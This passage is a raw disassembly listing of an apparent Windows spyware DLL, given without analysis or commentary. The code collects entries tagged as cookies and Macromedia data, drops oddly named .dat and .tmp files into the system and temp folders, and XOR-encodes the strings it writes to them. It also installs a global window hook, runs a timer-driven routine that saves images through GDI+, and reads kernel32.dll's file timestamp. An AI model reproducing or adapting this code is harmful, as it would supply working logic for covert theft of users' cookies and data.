mov ecx, [ebp+eax*4+Memory]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+var_4348]
mov [ebp+edx*4+Memory], 0
mov eax, [ebp+var_4348]
add eax, 1
mov [ebp+var_4348], eax
jmp short loc_1000C487
; ---------------------------------------------------------------------------
loc_1000C4E4: ; CODE XREF: sub_1000B7EF+CA6�j
mov [ebp+var_4348], 0
loc_1000C4EE: ; CODE XREF: sub_1000B7EF+D2A�j
mov ecx, [ebp+var_4348]
cmp dword_1004B770[ecx*4], 0
jz short loc_1000C51B
cmp [ebp+var_4348], 1000h
jge short loc_1000C51B
mov edx, [ebp+var_4348]
add edx, 1
mov [ebp+var_4348], edx
jmp short loc_1000C4EE
; ---------------------------------------------------------------------------
loc_1000C51B: ; CODE XREF: sub_1000B7EF+D0D�j
; sub_1000B7EF+D19�j
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_4348]
mov dword_1004B770[ecx*4], eax
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022050
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_18 ; "%s%s"
lea ecx, [ebp+String2]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, [ebp+var_4348]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_4348]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+100h], 0
mov ecx, [ebp+var_4348]
mov edx, dword_1004B770[ecx*4]
mov dword ptr [edx+104h], 0
lea eax, [ebp+Filename]
push eax ; lpString2
mov ecx, [ebp+var_4348]
mov edx, dword_1004B770[ecx*4]
add edx, 108h
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset byte_10065ED8
push offset aS__macromed ; "%s__macromed"
mov eax, [ebp+var_4348]
mov ecx, dword_1004B770[eax*4]
add ecx, 207h
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
mov edx, [ebp+var_4348]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+var_4348]
mov [eax+308h], ecx
mov edx, [ebp+var_4348]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+30Ch], 1
mov ecx, [ebp+var_4348]
mov edx, dword_1004B770[ecx*4]
push edx ; LPVOID
call StartAddress
test eax, eax
jz short loc_1000C672
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 1 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hFile], eax
cmp [ebp+hFile], 0FFFFFFFFh
jz short loc_1000C672
mov ecx, [ebp+hFile]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000C672: ; CODE XREF: sub_1000B7EF+E52�j
; sub_1000B7EF+E77�j
jmp short loc_1000C681
; ---------------------------------------------------------------------------
loc_1000C674: ; CODE XREF: sub_1000B7EF+7CE�j
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000C681: ; CODE XREF: sub_1000B7EF:loc_1000C672�j
push 0FFh ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset aCok458en_dat ; "\\cok458en.dat"
lea ecx, [ebp+FileName]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea edx, [ebp+FileName]
push edx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jnz loc_1000C9C2
mov [ebp+var_4348], 0
push 105h ; Size
push 0 ; Val
mov eax, dword_100281F0
mov ecx, Dest[eax*4]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov dword_100281F0, 0
lea edx, [ebp+Filename]
push edx ; lpBuffer
push 0FFh ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
push offset aCok37qa93_tmp ; "cok37qa93.tmp"
lea eax, [ebp+Filename]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea ecx, [ebp+Filename]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+var_4EE4], eax
cmp [ebp+var_4EE4], 0FFFFFFFFh
jnz loc_1000C805
push 0
push 21h
mov edx, dword_100281F0
mov eax, Dest[edx*4]
push eax
push 0
call dword_1006A8F4 ; SHGetSpecialFolderPathA
push 0 ; dwMilliseconds
lea ecx, [ebp+Memory]
push ecx ; int
mov edx, dword_100281F0
mov eax, Dest[edx*4]
push eax ; int
call sub_100071C0
add esp, 0Ch
lea ecx, [ebp+Memory]
push ecx ; int
lea edx, [ebp+Filename]
push edx ; Filename
call sub_1001AE00
add esp, 8
loc_1000C7A6: ; CODE XREF: sub_1000B7EF+1012�j
mov eax, [ebp+var_4348]
cmp [ebp+eax*4+Memory], 0
jbe short loc_1000C803
mov ecx, [ebp+var_4348]
mov edx, [ebp+ecx*4+Memory]
push edx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
mov eax, [ebp+var_4348]
mov ecx, [ebp+eax*4+Memory]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+var_4348]
mov [ebp+edx*4+Memory], 0
mov eax, [ebp+var_4348]
add eax, 1
mov [ebp+var_4348], eax
jmp short loc_1000C7A6
; ---------------------------------------------------------------------------
loc_1000C803: ; CODE XREF: sub_1000B7EF+FC5�j
jmp short loc_1000C812
; ---------------------------------------------------------------------------
loc_1000C805: ; CODE XREF: sub_1000B7EF+F62�j
mov ecx, [ebp+var_4EE4]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000C812: ; CODE XREF: sub_1000B7EF:loc_1000C803�j
mov [ebp+var_4348], 0
loc_1000C81C: ; CODE XREF: sub_1000B7EF+1058�j
mov edx, [ebp+var_4348]
cmp dword_1004B770[edx*4], 0
jz short loc_1000C849
cmp [ebp+var_4348], 1000h
jge short loc_1000C849
mov eax, [ebp+var_4348]
add eax, 1
mov [ebp+var_4348], eax
jmp short loc_1000C81C
; ---------------------------------------------------------------------------
loc_1000C849: ; CODE XREF: sub_1000B7EF+103B�j
; sub_1000B7EF+1047�j
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_4348]
mov dword_1004B770[ecx*4], eax
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022050
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_19 ; "%s%s"
lea ecx, [ebp+String2]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, [ebp+var_4348]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_4348]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+100h], 0
mov ecx, [ebp+var_4348]
mov edx, dword_1004B770[ecx*4]
mov dword ptr [edx+104h], 0
lea eax, [ebp+Filename]
push eax ; lpString2
mov ecx, [ebp+var_4348]
mov edx, dword_1004B770[ecx*4]
add edx, 108h
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset byte_10065ED8
push offset aS__cookies ; "%s__cookies"
mov eax, [ebp+var_4348]
mov ecx, dword_1004B770[eax*4]
add ecx, 207h
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
mov edx, [ebp+var_4348]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+var_4348]
mov [eax+308h], ecx
mov edx, [ebp+var_4348]
mov eax, dword_1004B770[edx*4]
mov dword ptr [eax+30Ch], 1
mov ecx, [ebp+var_4348]
mov edx, dword_1004B770[ecx*4]
push edx ; LPVOID
call StartAddress
test eax, eax
jz short loc_1000C9A9
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 1 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+var_4EE4], eax
cmp [ebp+var_4EE4], 0FFFFFFFFh
jz short loc_1000C9A9
mov ecx, [ebp+var_4EE4]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000C9A9: ; CODE XREF: sub_1000B7EF+1180�j
; sub_1000B7EF+11AB�j
mov edx, dword_100281F0
mov eax, Dest[edx*4]
push eax ; Memory
call ds:free ; free
add esp, 4
jmp short loc_1000C9CF
; ---------------------------------------------------------------------------
loc_1000C9C2: ; CODE XREF: sub_1000B7EF+EDF�j
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000C9CF: ; CODE XREF: sub_1000B7EF+11D1�j
mov eax, 1
loc_1000C9D4: ; CODE XREF: sub_1000B7EF+197�j
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
sub_1000B7EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000C9DC proc near ; CODE XREF: DllMain(x,x,x):loc_10013957�p
FileName = byte ptr -17Ch
var_17B = byte ptr -17Bh
Dst = dword ptr -7Ch
var_6C = dword ptr -6Ch
var_65 = byte ptr -65h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = byte ptr -62h
var_61 = byte ptr -61h
String1 = byte ptr -60h
lf = LOGFONTA ptr -40h
hObject = dword ptr -4
push ebp
mov ebp, esp
sub esp, 17Ch
push edi
mov [ebp+FileName], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_17B]
rep stosd
stosw
push 0FFFFFFh ; color
call ds:CreateSolidBrush ; CreateSolidBrush
mov hbr, eax
push 3Ch ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+Dst], 0Dh
mov [ebp+var_6C], 2BCh
mov [ebp+var_65], 0
mov [ebp+var_64], 3
mov [ebp+var_63], 2
mov [ebp+var_62], 2
mov [ebp+var_61], 22h
push offset aTimesNewRoman ; "Times New Roman"
lea ecx, [ebp+String1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
lea edx, [ebp+Dst]
push edx ; lplf
call ds:CreateFontIndirectA ; CreateFontIndirectA
mov dword_1006A91C, eax
push 3Ch ; Size
push 0 ; Val
lea eax, [ebp+lf]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+lf.lfHeight], 13h
mov [ebp+lf.lfWeight], 2BCh
mov [ebp+lf.lfCharSet], 0
mov [ebp+lf.lfOutPrecision], 3
mov [ebp+lf.lfClipPrecision], 2
mov [ebp+lf.lfQuality], 2
mov [ebp+lf.lfPitchAndFamily], 22h
push offset aTimesNewRoma_0 ; "Times New Roman"
lea ecx, [ebp+lf.lfFaceName]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
lea edx, [ebp+lf]
push edx ; lplf
call ds:CreateFontIndirectA ; CreateFontIndirectA
mov dword_1006A920, eax
push 0 ; Time
call ds:time ; time
add esp, 4
push eax ; Seed
call ds:srand ; srand
add esp, 4
push 0FFh ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset aKernel32_dll ; "\\kernel32.dll"
lea ecx, [ebp+FileName]
push ecx ; Dest
call strcat ; strcat
add esp, 8
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea edx, [ebp+FileName]
push edx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 0 ; lpLastWriteTime
push 0 ; lpLastAccessTime
push offset CreationTime ; lpCreationTime
mov eax, [ebp+hObject]
push eax ; hFile
call ds:GetFileTime ; GetFileTime
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
push offset aKpmm ; "KPMM"
call ds:RegisterWindowMessageA ; RegisterWindowMessageA
mov dword_1002C210, eax
push 0 ; dwThreadId
push offset aMs32clod_8 ; "ms32clod"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hmod
push offset sub_10004960 ; lpfn
push 7 ; idHook
call ds:SetWindowsHookExA ; SetWindowsHookExA
mov dword_1006A90C, eax
push 0 ; lpName
push 0 ; bInitialState
push 0 ; bManualReset
push 0 ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
mov hHandle, eax
push offset sub_1000AF7F ; lpTimerFunc
push 0EA60h ; uElapse
push 0 ; nIDEvent
push 0 ; hWnd
call ds:SetTimer ; SetTimer
mov dword_100241D4, eax
push 0 ; lpThreadId
push 0 ; dwCreationFlags
push 0 ; lpParameter
push offset sub_1000B7EF ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
pop edi
mov esp, ebp
pop ebp
retn
sub_1000C9DC endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
mov dword ptr [ebp-218h], 0
mov dword ptr [ebp-214h], 0
mov byte ptr [ebp-204h], 3Bh
loc_1000CBBF: ; CODE XREF: .text:1000CC36�j
mov eax, [ebp-218h]
cmp dword_10037024[eax*4], 0
jz short loc_1000CC38
cmp dword ptr [ebp-218h], 40h
jge short loc_1000CC38
mov ecx, [ebp+8]
push ecx
mov edx, [ebp-218h]
mov eax, dword_10037024[edx*4]
push eax
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_1000CC27
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
push offset aSD_0 ; "%s %d"
mov eax, [ebp-218h]
mov ecx, dword_10037024[eax*4]
push ecx
call ds:sprintf ; sprintf
add esp, 10h
mov dword ptr [ebp-214h], 1
jmp short loc_1000CC38
; ---------------------------------------------------------------------------
loc_1000CC27: ; CODE XREF: .text:1000CBF5�j
mov edx, [ebp-218h]
add edx, 1
mov [ebp-218h], edx
jmp short loc_1000CBBF
; ---------------------------------------------------------------------------
loc_1000CC38: ; CODE XREF: .text:1000CBCD�j
; .text:1000CBD6�j ...
cmp dword ptr [ebp-218h], 40h
jge short loc_1000CC92
cmp dword ptr [ebp-214h], 0
jnz short loc_1000CC92
mov eax, [ebp+8]
push eax
call ds:lstrlenA ; lstrlenA
add eax, 14h
push eax
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp-218h]
mov dword_10037024[ecx*4], eax
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
push offset aSD_1 ; "%s %d"
mov ecx, [ebp-218h]
mov edx, dword_10037024[ecx*4]
push edx
call ds:sprintf ; sprintf
add esp, 10h
loc_1000CC92: ; CODE XREF: .text:1000CC3F�j
; .text:1000CC48�j
push 0FFh
lea eax, [ebp-200h]
push eax
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset aL00834_dat_0 ; "\\l00834.dat"
lea ecx, [ebp-200h]
push ecx
call ds:lstrcatA ; lstrcatA
push 0
push 80h
push 2
push 0
push 2
push 40000000h
lea edx, [ebp-200h]
push edx
call ds:CreateFileA ; CreateFileA
mov [ebp-20Ch], eax
mov dword ptr [ebp-218h], 0
loc_1000CCE5: ; CODE XREF: .text:1000CDE3�j
mov eax, [ebp-218h]
cmp dword_10037024[eax*4], 0
jz loc_1000CDE8
cmp dword ptr [ebp-218h], 40h
jge loc_1000CDE8
mov byte ptr [ebp-100h], 0
mov dword ptr [ebp-21Ch], 0
jmp short loc_1000CD28
; ---------------------------------------------------------------------------
loc_1000CD19: ; CODE XREF: .text:1000CD71�j
mov ecx, [ebp-21Ch]
add ecx, 1
mov [ebp-21Ch], ecx
loc_1000CD28: ; CODE XREF: .text:1000CD17�j
mov edx, [ebp-218h]
mov eax, dword_10037024[edx*4]
push eax
call ds:lstrlenA ; lstrlenA
cmp [ebp-21Ch], eax
jge short loc_1000CD73
mov ecx, [ebp-218h]
mov edx, dword_10037024[ecx*4]
mov eax, [ebp-21Ch]
movsx ecx, byte ptr [edx+eax]
movsx edx, byte ptr [ebp-204h]
xor ecx, edx
mov eax, [ebp-21Ch]
mov [ebp+eax-100h], cl
jmp short loc_1000CD19
; ---------------------------------------------------------------------------
loc_1000CD73: ; CODE XREF: .text:1000CD42�j
push 0
lea ecx, [ebp-208h]
push ecx
mov edx, [ebp-218h]
mov eax, dword_10037024[edx*4]
push eax
call ds:lstrlenA ; lstrlenA
push eax
lea ecx, [ebp-100h]
push ecx
mov edx, [ebp-20Ch]
push edx
call ds:WriteFile ; WriteFile
movsx eax, byte ptr [ebp-204h]
xor eax, 0Ah
mov [ebp-210h], al
push 0
lea ecx, [ebp-208h]
push ecx
push 1
lea edx, [ebp-210h]
push edx
mov eax, [ebp-20Ch]
push eax
call ds:WriteFile ; WriteFile
mov ecx, [ebp-218h]
add ecx, 1
mov [ebp-218h], ecx
jmp loc_1000CCE5
; ---------------------------------------------------------------------------
loc_1000CDE8: ; CODE XREF: .text:1000CCF3�j
; .text:1000CD00�j
mov edx, [ebp-20Ch]
push edx
call ds:CloseHandle ; CloseHandle
mov eax, 1
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+8]
push eax
call ds:lstrlenA ; lstrlenA
push eax
call ds:malloc ; malloc
add esp, 4
mov [ebp+0Ch], eax
mov ecx, [ebp+0Ch]
mov byte ptr [ecx], 0
mov dword ptr [ebp-4], 0
mov dword ptr [ebp-8], 0
mov byte ptr [ebp-14h], 0
xor edx, edx
mov [ebp-13h], edx
mov [ebp-0Fh], edx
mov [ebp-0Bh], dl
loc_1000CE3E: ; CODE XREF: .text:1000CF0E�j
mov eax, 1
test eax, eax
jz loc_1000CF13
push offset dword_100739B8
lea ecx, [ebp-14h]
push ecx
call ds:lstrcpyA ; lstrcpyA
mov dword ptr [ebp-8], 0
mov edx, [ebp+8]
add edx, [ebp-4]
movsx eax, byte ptr [edx]
cmp eax, 0Dh
jnz short loc_1000CE78
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
loc_1000CE78: ; CODE XREF: .text:1000CE6D�j
mov edx, [ebp+8]
add edx, [ebp-4]
movsx eax, byte ptr [edx]
cmp eax, 0Ah
jnz short loc_1000CE8F
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
loc_1000CE8F: ; CODE XREF: .text:1000CE84�j
; .text:1000CECB�j
mov edx, [ebp+8]
add edx, [ebp-4]
movsx eax, byte ptr [edx]
cmp eax, 0Dh
jz short loc_1000CECD
mov ecx, [ebp+8]
push ecx
call ds:lstrlenA ; lstrlenA
cmp [ebp-4], eax
jg short loc_1000CECD
push 1
mov edx, [ebp+8]
add edx, [ebp-4]
push edx
lea eax, [ebp-14h]
push eax
call ds:strncat ; strncat
add esp, 0Ch
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
jmp short loc_1000CE8F
; ---------------------------------------------------------------------------
loc_1000CECD: ; CODE XREF: .text:1000CE9B�j
; .text:1000CEAA�j
mov edx, [ebp-4]
add edx, 2
mov [ebp-4], edx
lea eax, [ebp-14h]
push eax
call sub_10002881
add esp, 4
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_1000CEED
jmp short loc_1000CF13
; ---------------------------------------------------------------------------
loc_1000CEED: ; CODE XREF: .text:1000CEE9�j
mov ecx, [ebp-8]
push ecx
mov edx, [ebp+8]
add edx, [ebp-4]
push edx
mov eax, [ebp+0Ch]
push eax
call ds:strncat ; strncat
add esp, 0Ch
mov ecx, [ebp-4]
add ecx, [ebp-8]
mov [ebp-4], ecx
jmp loc_1000CE3E
; ---------------------------------------------------------------------------
loc_1000CF13: ; CODE XREF: .text:1000CE45�j
; .text:1000CEEB�j
mov eax, [ebp+0Ch]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000021 BYTES: COLLAPSED FUNCTION std::_Iterator_base::_Iterator_base(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000CF50 proc near ; CODE XREF: sub_1000105D+16�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+arg_4]
mov [edx+4], eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_8]
mov [ecx+8], edx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 10h
sub_1000CF50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000CF90 proc near ; CODE XREF: sub_100020B5+40C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_8]
mov ecx, [eax]
mov edx, [ebp+var_8]
push edx
call dword ptr [ecx+38h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000CFCC
push offset dword_10023358
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_1001C8FE
loc_1000CFCC: ; CODE XREF: sub_1000CF90+28�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 0Ch
sub_1000CF90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000CFE0 proc near ; CODE XREF: sub_100020B5+47A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx]
mov eax, [ebp+var_8]
push eax
call dword ptr [edx+3Ch]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000D020
push offset dword_10023358
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_1001C8FE
loc_1000D020: ; CODE XREF: sub_1000CFE0+2C�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 10h
sub_1000CFE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D030 proc near ; CODE XREF: sub_100020B5+5B8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+arg_1C]
push eax
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx]
mov ecx, [ebp+var_8]
push ecx
call dword ptr [eax+44h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000D080
push offset dword_10023358
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+var_4]
push eax
call sub_1001C8FE
loc_1000D080: ; CODE XREF: sub_1000D030+3C�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 20h
sub_1000D030 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D090 proc near ; CODE XREF: sub_100020B5+4F2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx]
mov ecx, [ebp+var_8]
push ecx
call dword ptr [eax+54h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_1000D0D4
push offset dword_10023358
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+var_4]
push eax
call sub_1001C8FE
loc_1000D0D4: ; CODE XREF: sub_1000D090+30�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 14h
sub_1000D090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D0E0 proc near ; CODE XREF: sub_1000279F+1C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call j_GdipGetImageEncodersSize_thunk
pop ebp
retn
sub_1000D0E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D100 proc near ; CODE XREF: sub_1000279F+5B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call j_GdipGetImageEncoders_thunk
pop ebp
retn
sub_1000D100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D120 proc near ; CODE XREF: TimerFunc+21D�p
; TimerFunc+23D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_4]
mov ecx, [eax+4]
push ecx
call j_GdipSaveImageToFile_thunk
push eax
mov ecx, [ebp+var_4]
call sub_1000D150
mov esp, ebp
pop ebp
retn 0Ch
sub_1000D120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D150 proc near ; CODE XREF: sub_1000D120+23�p
; sub_1000D200+39�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
cmp [ebp+arg_0], 0
jz short loc_1000D16B
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax+8], ecx
mov eax, [ebp+arg_0]
jmp short loc_1000D16E
; ---------------------------------------------------------------------------
loc_1000D16B: ; CODE XREF: sub_1000D150+B�j
mov eax, [ebp+arg_0]
loc_1000D16E: ; CODE XREF: sub_1000D150+19�j
mov esp, ebp
pop ebp
retn 4
sub_1000D150 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D180 proc near ; CODE XREF: TimerFunc+433�p
; sub_1000D3A0+A�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_1000D1A0
mov esp, ebp
pop ebp
retn
sub_1000D180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D1A0 proc near ; CODE XREF: sub_1000D180+A�p
; sub_1000D1C0+A�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_1001E450
mov ecx, [ebp+var_4]
mov edx, [ecx+4]
push edx
call j_GdipDisposeImage_thunk
mov esp, ebp
pop ebp
retn
sub_1000D1A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000D1C0 proc near ; DATA XREF: .rdata:off_1001E450�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_1000D1A0
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_1000D1E5
